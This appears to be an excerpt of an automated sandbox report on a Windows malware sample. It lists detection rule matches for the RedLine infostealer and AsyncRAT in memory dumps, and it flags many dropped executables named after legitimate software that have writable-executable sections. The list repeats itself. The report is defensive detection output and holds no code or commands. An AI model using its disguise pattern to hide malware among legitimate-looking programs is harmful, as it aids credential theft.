                Source: 0000001E.00000001.1659980996.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 0000001E.00000002.1740115481.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000026.00000002.1813978225.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: Acrobat.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: updater.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: Au3Info.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: Au3Info_x64.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AutoIt3Help.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AutoIt3_x64.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: appvcleaner.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: SciTE.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AppVShNotify.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AdobeARMHelper.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: IntegratedOffice.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: MavInject32.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: OfficeC2RClient.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: officesvcmgr.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: chrome_pwa_launcher.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: chrmstp.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: setup.exe0.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: armsvc.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: alg.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AppVClient.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jaureg.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jucheck.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jusched.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: java.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: javaw.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: javaws.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleCrashHandler.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleCrashHandler64.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleUpdate.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleUpdateBroker.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: DiagnosticsHub.StandardCollector.Service.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: FXSSVC.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: elevation_service.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: elevation_service.exe0.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: maintenanceservice.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleUpdateComRegisterShell64.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleUpdateCore.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleUpdateOnDemand.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: 117.0.5938.132_chrome_installer.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jabswitch.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: java-rmi.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: java.exe0.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: javacpl.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: javaw.exe0.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: javaws.exe0.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: msdtc.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: msiexec.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: PerceptionSimulationService.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jjs.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jp2launcher.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: keytool.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: kinit.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: klist.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: ktab.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: orbd.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: pack200.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: policytool.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: rmid.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: perfhost.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: Locator.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: MsSense.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: SensorDataService.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: snmptrap.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: Spectrum.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: ssh-agent.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: TieringEngineService.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: rmiregistry.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: servertool.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: ssvagent.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: tnameserv.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: unpack200.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: ie_to_edge_stub.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: cookie_exporter.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: identity_helper.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: setup.exe1.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: msedgewebview2.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AgentService.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: vds.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: VSSVC.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: wbengine.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: WmiApSrv.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: wmpnetwk.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: SearchIndexer.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: 7z.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: Acrobat.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: updater.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: Au3Info.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: Au3Info_x64.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AutoIt3Help.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AutoIt3_x64.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: appvcleaner.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: SciTE.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AppVShNotify.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AdobeARMHelper.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: IntegratedOffice.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: MavInject32.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: OfficeC2RClient.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: officesvcmgr.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: chrome_pwa_launcher.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: chrmstp.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: setup.exe0.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: armsvc.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: alg.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
